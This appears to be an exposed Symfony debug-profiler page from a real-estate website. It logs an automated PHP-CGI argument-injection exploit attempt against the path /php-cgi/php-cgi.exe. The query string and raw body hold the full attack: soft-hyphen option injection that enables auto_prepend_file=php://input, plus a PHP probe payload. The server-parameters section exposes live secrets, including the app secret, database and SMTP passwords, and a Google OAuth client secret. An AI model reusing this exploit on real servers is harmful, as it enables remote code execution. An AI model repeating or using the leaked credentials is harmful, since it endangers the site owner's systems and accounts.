ErrorController

Request

GET Parameters

Key Value
�d_cgi_force_redirect=0_�d_disable_functions=""_�d_allow_url_include=1_�d_auto_prepend_file=php://input
""

POST Parameters

Key Value
<?php_$env
[
  ""USERNAME"" => " @get_current_user(); $env["HOSTNAME"] = @gethostname(); $env['USERNAME_SIGN'] = @md5($env["USERNAME"]); echo @json_encode($env); @die(); ?>"
]

Uploaded Files

No files were uploaded

Request Attributes

Key Value
_controller
"error_controller"
_stopwatch_token
"d82a32"
exception
Symfony\Component\HttpKernel\Exception\NotFoundHttpException {#272
  #message: "No route found for "POST https://immolier.com/php-cgi/php-cgi.exe""
  #code: 0
  #file: "/home/immoliv/www/vendor/symfony/http-kernel/EventListener/RouterListener.php"
  #line: 128
  -previous: Symfony\Component\Routing\Exception\ResourceNotFoundException {#231 …}
  -statusCode: 404
  -headers: []
  trace: {
    /home/immoliv/www/vendor/symfony/http-kernel/EventListener/RouterListener.php:128 {
      Symfony\Component\HttpKernel\EventListener\RouterListener->onKernelRequest(RequestEvent $event) …
      › 
      ›     throw new NotFoundHttpException($message, $e);} catch (MethodNotAllowedException $e) {
    }
    /home/immoliv/www/vendor/symfony/event-dispatcher/Debug/WrappedListener.php:115 {
      Symfony\Component\EventDispatcher\Debug\WrappedListener->__invoke(object $event, string $eventName, EventDispatcherInterface $dispatcher): void …
      › 
      › ($this->optimizedListener ?? $this->listener)($event, $eventName, $dispatcher);arguments: {
        $event: Symfony\Component\HttpKernel\Event\RequestEvent {#217 …}
        ...: {
          "kernel.request"
          Symfony\Component\HttpKernel\Debug\TraceableEventDispatcher {#202 …}
        }
      }
    }
    /home/immoliv/www/vendor/symfony/event-dispatcher/EventDispatcher.php:230 {
      Symfony\Component\EventDispatcher\EventDispatcher->callListeners(iterable $listeners, string $eventName, object $event) …
      ›     }    $listener($event, $eventName, $this);}
      arguments: {
        $event: Symfony\Component\HttpKernel\Event\RequestEvent {#217 …}
        $eventName: "kernel.request"
        $dispatcher: Symfony\Component\HttpKernel\Debug\TraceableEventDispatcher {#202 …}
      }
    }
    /home/immoliv/www/vendor/symfony/event-dispatcher/EventDispatcher.php:59 {
      Symfony\Component\EventDispatcher\EventDispatcher->dispatch(object $event, string $eventName = null): object …
      › if ($listeners) {    $this->callListeners($listeners, $eventName, $event);}
      arguments: {
        $listeners: [ …10]
        $eventName: "kernel.request"
        $event: Symfony\Component\HttpKernel\Event\RequestEvent {#217 …}
      }
    }
    /home/immoliv/www/vendor/symfony/event-dispatcher/Debug/TraceableEventDispatcher.php:153 {
      Symfony\Component\EventDispatcher\Debug\TraceableEventDispatcher->dispatch(object $event, string $eventName = null): object …
      › try {    $this->dispatcher->dispatch($event, $eventName);} finally {
      arguments: {
        $event: Symfony\Component\HttpKernel\Event\RequestEvent {#217 …}
        $eventName: "kernel.request"
      }
    }
    /home/immoliv/www/vendor/symfony/http-kernel/HttpKernel.php:129 {
      Symfony\Component\HttpKernel\HttpKernel->handleRaw(Request $request, int $type = self::MAIN_REQUEST): Response …
      › $event = new RequestEvent($this, $request, $type);$this->dispatcher->dispatch($event, KernelEvents::REQUEST);arguments: {
        $event: Symfony\Component\HttpKernel\Event\RequestEvent {#217 …}
        $eventName: "kernel.request"
      }
    }
    /home/immoliv/www/vendor/symfony/http-kernel/HttpKernel.php:75 {
      Symfony\Component\HttpKernel\HttpKernel->handle(Request $request, int $type = HttpKernelInterface::MAIN_REQUEST, bool $catch = true): Response …
      › try {    return $this->handleRaw($request, $type);} catch (\Exception $e) {
      arguments: {
        $request: Symfony\Component\HttpFoundation\Request {#14 …}
        $type: 1
      }
    }
    /home/immoliv/www/vendor/symfony/http-kernel/Kernel.php:202 {
      Symfony\Component\HttpKernel\Kernel->handle(Request $request, int $type = HttpKernelInterface::MAIN_REQUEST, bool $catch = true): Response …
      › try {    return $this->getHttpKernel()->handle($request, $type, $catch);} finally {
      arguments: {
        $request: Symfony\Component\HttpFoundation\Request {#14 …}
        $type: 1
        $catch: true
      }
    }
    /home/immoliv/www/vendor/symfony/runtime/Runner/Symfony/HttpKernelRunner.php:35 {
      Symfony\Component\Runtime\Runner\Symfony\HttpKernelRunner->run(): int …
      › {    $response = $this->kernel->handle($this->request);    $response->send();
      arguments: {
        $request: Symfony\Component\HttpFoundation\Request {#14 …}
      }
    }
    /home/immoliv/www/vendor/autoload_runtime.php:29 {
      require_once …
      ›         ->getRunner($app)        ->run());
    }
    /home/immoliv/www/public/index.php:5 {
      › 
      › require_once dirname(__DIR__).'/vendor/autoload_runtime.php';arguments: {
        "/home/immoliv/www/vendor/autoload_runtime.php"
      }
    }
  }
}
logger
Symfony\Bridge\Monolog\Logger {#136 …8}

Request Headers

Header Value
accept-encoding
"gzip"
content-length
"164"
content-type
"application/x-www-form-urlencoded"
host
"immolier.com"
remote-ip
"207.154.212.47"
user-agent
"Go-http-client/1.1"
x-forwarded-for
"207.154.212.47"
x-forwarded-proto
"https"
x-ovhrequest-id
"97e5776460bb9fa4b2badb675ccb398e"
x-php-ob-level
"1"
x-predictor
"1"

Request Content

Raw

<?php $env["USERNAME"] = @get_current_user(); $env["HOSTNAME"] = @gethostname(); $env['USERNAME_SIGN'] = @md5($env["USERNAME"]); echo @json_encode($env); @die(); ?>

Response

Response Headers

Header Value
cache-control
"no-cache, private"
content-type
"text/html; charset=UTF-8"
date
"Sun, 06 Oct 2024 13:39:48 GMT"
x-debug-exception
"No%20route%20found%20for%20%22POST%20https%3A%2F%2Fimmolier.com%2Fphp-cgi%2Fphp-cgi.exe%22"
x-debug-exception-file
"%2Fhome%2Fimmoliv%2Fwww%2Fvendor%2Fsymfony%2Fhttp-kernel%2FEventListener%2FRouterListener.php:128"
x-debug-token
"208fe3"

Cookies

Request Cookies

No request cookies

Response Cookies

No response cookies

Session

Session Metadata

No session metadata

Session Attributes

No session attributes

Session Usage

0 Usages
Stateless check enabled

Session not used.

Flashes

Flashes

No flash messages were created.

Server Parameters

Server Parameters

Defined in .env

Key Value
APP_ENV
"dev"
APP_SECRET
"902c83c7d439f32fa453d16f366b9039"
DATABASE_URL
"mysql://immolivimmofr160:16ImmofKamou@immolivimmofr160.mysql.db/immolivimmofr160?serverVersion=5.6"
GOOGLE_CLIENT_ID
"807075116142-pb3sf3o6ngt6iinuhu2klrr433dti6ur.apps.googleusercontent.com"
GOOGLE_CLIENT_SECRET
"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"
MAILER_DSN
"smtp://contact@immolier.com:16ImmofKamou@ssl0.ovh.net:587"
MESSENGER_TRANSPORT_DSN
"doctrine://default?auto_setup=0"

Defined as regular env variables

Key Value
APP_DEBUG
"1"
CFG_CLUSTER
"cluster030"
CONTENT_LENGTH
"164"
CONTENT_TYPE
"application/x-www-form-urlencoded"
DOCUMENT_ROOT
"/home/immoliv/www/public"
ENVIRONMENT
"production"
FCGI_ROLE
"RESPONDER"
GATEWAY_INTERFACE
"CGI/1.1"
GEOIP_AREA_CODE
"0"
GEOIP_CITY
"Frankfurt Am Main"
GEOIP_COUNTRY_CODE
"DE"
GEOIP_COUNTRY_NAME
"Germany"
GEOIP_DMA_CODE
"0"
GEOIP_LATITUDE
"50.118801"
GEOIP_LONGITUDE
"8.684300"
GEOIP_REGION
"05"
HTTPS
"on"
HTTP_ACCEPT_ENCODING
"gzip"
HTTP_HOST
"immolier.com"
HTTP_REMOTE_IP
"207.154.212.47"
HTTP_USER_AGENT
"Go-http-client/1.1"
HTTP_X_FORWARDED_FOR
"207.154.212.47"
HTTP_X_FORWARDED_PROTO
"https"
HTTP_X_OVHREQUEST_ID
"97e5776460bb9fa4b2badb675ccb398e"
HTTP_X_PREDICTOR
"1"
PHP_SELF
"/index.php"
QUERY_STRING
"%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D""+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input"
REDIRECT_QUERY_STRING
"%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D""+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input"
REDIRECT_STATUS
"200"
REDIRECT_URL
"/php-cgi/php-cgi.exe"
REMOTE_ADDR
"207.154.212.47"
REMOTE_PORT
"43700"
REQUEST_METHOD
"GET"
REQUEST_TIME
1728221988
REQUEST_TIME_FLOAT
1728221988.6366
REQUEST_URI
"/php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D""+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input"
SCRIPT_FILENAME
"/home/immoliv/www/public/index.php"
SCRIPT_NAME
"/index.php"
SCRIPT_URI
"https://immolier.com:443/php-cgi/php-cgi.exe"
SCRIPT_URL
"/php-cgi/php-cgi.exe"
SERVER_ADDR
"10.30.20.85"
SERVER_ADMIN
"postmaster@immolier.com"
SERVER_NAME
"immolier.com"
SERVER_PORT
"443"
SERVER_PROTOCOL
"HTTP/1.1"
SERVER_SIGNATURE
""
SERVER_SOFTWARE
"Apache"
SYMFONY_DOTENV_VARS
"MESSENGER_TRANSPORT_DSN,APP_ENV,APP_SECRET,DATABASE_URL,MAILER_DSN,GOOGLE_CLIENT_ID,GOOGLE_CLIENT_SECRET"
UNIQUE_ID
"ZwKTJPG3I40h9hfzU6O2GgAAAAw"
USER
"immoliv"
argc
8
argv
[
  "%ADd"
  "cgi.force_redirect%3D0"
  "%ADd"
  "disable_functions%3D"""
  "%ADd"
  "allow_url_include%3D1"
  "%ADd"
  "auto_prepend_file%3Dphp://input"
]

Parent Request

Return to parent request (token = 923083)

Key Value
_remove_csp_headers
true
_stopwatch_token
"578b3a"